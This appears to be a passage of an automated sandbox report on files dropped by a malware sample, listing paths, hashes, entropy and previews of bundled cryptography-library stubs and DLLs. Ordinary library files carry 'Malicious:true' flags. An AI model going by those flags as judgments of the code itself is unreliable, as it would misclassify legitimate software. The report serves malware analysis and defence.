                                                                                                                                            SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\SecretSharing.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):820
                                                                                                                                            Entropy (8bit):4.725635475246741
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                            MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                            SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                            SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                            SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):264
                                                                                                                                            Entropy (8bit):5.24201386772276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:/OBQl+KY+ZFZ6+nq95/n23d6p9ArM7BLQIaCkkrVXyit:2Bw+WZX6+nc/2Iph1dankrty2
                                                                                                                                            MD5:EFB2544AAC08D468087C1F6143CA69AF
                                                                                                                                            SHA1:4AA4AFBFAB7B3E00A3808941A797B819E70B0E68
                                                                                                                                            SHA-256:8E1194421D5980B8E70C73FF965E1951EBE1857EB1146B55F143E8EF2D0D9AB5
                                                                                                                                            SHA-512:909AC8EF53915EA36175AF0DA6F749CA372BB3D04378FF1F322C3CFB3CF4F843B8F0685458B5940DF3A949398671C5CFDD4188EEBE1609CF638D4B161503DE08
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e1...............................g.d...Z.d.S.).)...KDF..SecretSharing..DHN)...__all__........lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Protocol\__init__.py..<module>r........s..........>..)..(..(......r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44
                                                                                                                                            Entropy (8bit):4.516027641266231
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                            MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                            SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                            SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                            SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\_scrypt.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.799063285091512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                            MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                            SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                            SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                            SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\DSA.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1412
                                                                                                                                            Entropy (8bit):4.9317569017679235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                            MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                            SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                            SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                            SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\ECC.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3368
                                                                                                                                            Entropy (8bit):4.623430359144985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PjOqA+h7+/O1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAow58Kk1VZFGK0SOrTQASxCs
                                                                                                                                            MD5:D6B0C334F2E86B944B8B5C595D46091B
                                                                                                                                            SHA1:6D774B4906613E8AEDE7889D06E5F57C3BA51DE5
                                                                                                                                            SHA-256:11E9396C412E693B5A7D2B9A455BF7596853BE94BC0FCE01F292C1732934CBA3
                                                                                                                                            SHA-512:A58B1231C7EEBBEC0AFE7192A59204912A88D5E3F51A0356811DCBC11158A11E5D4FF617B4682817D8BE56C88FDA27BBAB95850C77C876336A2DE25927F129EB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... def size_

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\ElGamal.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):692
                                                                                                                                            Entropy (8bit):4.899620335781504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                            MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                            SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                            SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                            SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\RSA.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):4.5725118156821445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REquT4+vZ7+/0wWsAInlNAE+jm53s+eZNcN4n6Rs9Y+CMKoUDT+YsUVRVxzL3:B+h7+/05sX5+jm2+eDqszdPUDXVHVL3
                                                                                                                                            MD5:0DF7584DEADC1160766A1CF2E07FA3D2
                                                                                                                                            SHA1:79484FB8B9D7CE922DEBCAF136CDE6176DF649B4
                                                                                                                                            SHA-256:5CBA0D3C44217538026D4585ACA8F592FC0B21AD618AB11D45715539A365E024
                                                                                                                                            SHA-512:DD9AF3B3D3CBD332D831206883BF3C902ADCD828108215C00FA0D898B310A92A23D581BA3A513A5EA50880022E6DACF44E0AD1AF52253EE1F094F348F7B971E8
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, other: obj

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):754688
                                                                                                                                            Entropy (8bit):7.624959985050181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                            MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                            SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                            SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                            SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27648
                                                                                                                                            Entropy (8bit):5.792654050660321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                            MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                            SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                            SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                            SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed448.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67072
                                                                                                                                            Entropy (8bit):6.060461288575063
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                            MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                            SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
                                                                                                                                            SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                            SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_openssh.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):331
                                                                                                                                            Entropy (8bit):4.758113161274864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                            MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                            SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                            SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                            SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_x25519.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10752
                                                                                                                                            Entropy (8bit):4.488437566846231
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                            MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                            SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                            SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                            SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Random\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1563
                                                                                                                                            Entropy (8bit):4.912137517765064
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:2gyhnoX2WsYJhsq9rYPvfqCrJ4eBPFuGBvEeEWV:0M2WNsmkPvCGuG5Ey
                                                                                                                                            MD5:B089CF7D74B4712B4DB2B1B398F13745
                                                                                                                                            SHA1:BD0321C57147018DF8661A4D525C1EB7B925D6B9
                                                                                                                                            SHA-256:E99091C5BFAD090BB4207B7DAAA2297232BDEADE0127875E2DD61779D5417D57
                                                                                                                                            SHA-512:48DEFA4AE1277E07066871FD5808061B7D7AB925AA3D30DBF7A97DE26BBFA50C14116AC6EC365010ECD50A4CAD56CB5948A79D8FFD091F14C89D02A541CEDEDB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eJ.........................F.....d.d.g.Z.d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc.....................&.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.S.)..._UrandomRNGc..................... .....t...........|...............S.).z0Return a random byte string of the desired size.r....)...self..ns.... .jC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Random\__init__.py..readz._UrandomRNG.read....s..........q.z.z........c...........................d.S...z0Method provided for backward compatibility only.N....r....s.... r......flushz._UrandomRNG.flush!...............r....c...........................d.S.r....r....r....s.... r......reinitz._UrandomRNG.reinit%...r....r....c...........................d.S.r....r....r....s.... r......closez._UrandomRNG.close)...r....r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........sP...................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Random\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):386
                                                                                                                                            Entropy (8bit):4.828244249619416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                            MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                            SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
                                                                                                                                            SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                            SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Random\random.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):854
                                                                                                                                            Entropy (8bit):4.891350639959851
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REqJBQCf+sAJOIE5P0fid1o4zOZKXiojo/f:lQW+sd5CidO4ifao/f
                                                                                                                                            MD5:0B01F3499238530A9A99E48F305DB9AC
                                                                                                                                            SHA1:7AE9ADEAF96CF6B47C721A124AA568AB1A0B605C
                                                                                                                                            SHA-256:043AEDA2F263A42A0086FCBB0CA801FF1D9BF396FFCC966452FF25DD5030A013
                                                                                                                                            SHA-512:4CDCFA0E53EBE9F65207817A79419F6C60E6F0BB51EF4ECDB89736244058A690410F767EC8AAAC2C2B10BDB38361E0F60FCD3DF3580639935A423A0E6E068517
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Signature\DSS.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1121
                                                                                                                                            Entropy (8bit):4.992804063334473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2C19+14f+161z4NoQoAUx9Bw+LtvUO38AdILhG8A+N8APto5BfTE5PadOI:hy+1w+1KcJoNRL9UfEIL/LWStrYdB
                                                                                                                                            MD5:38E9FC3517817B876019A478AB882734
                                                                                                                                            SHA1:34493501A5A5AE3C744CBAC46BAEA8C2F276B08B
                                                                                                                                            SHA-256:BB3A920B06532D4AA7363F205556243F2B71014E1FA0851DE64840CD26C9AD50
                                                                                                                                            SHA-512:6E003672E1F2B603325A57C66F59C0C1487243D5FC738A809FF04960C5A675AE3E68DCF0BB101CC00944DFB80FFBAF1869DA02CB8D46AD92841E9A9330689F6F
                                                                                                                                            Malicious:true
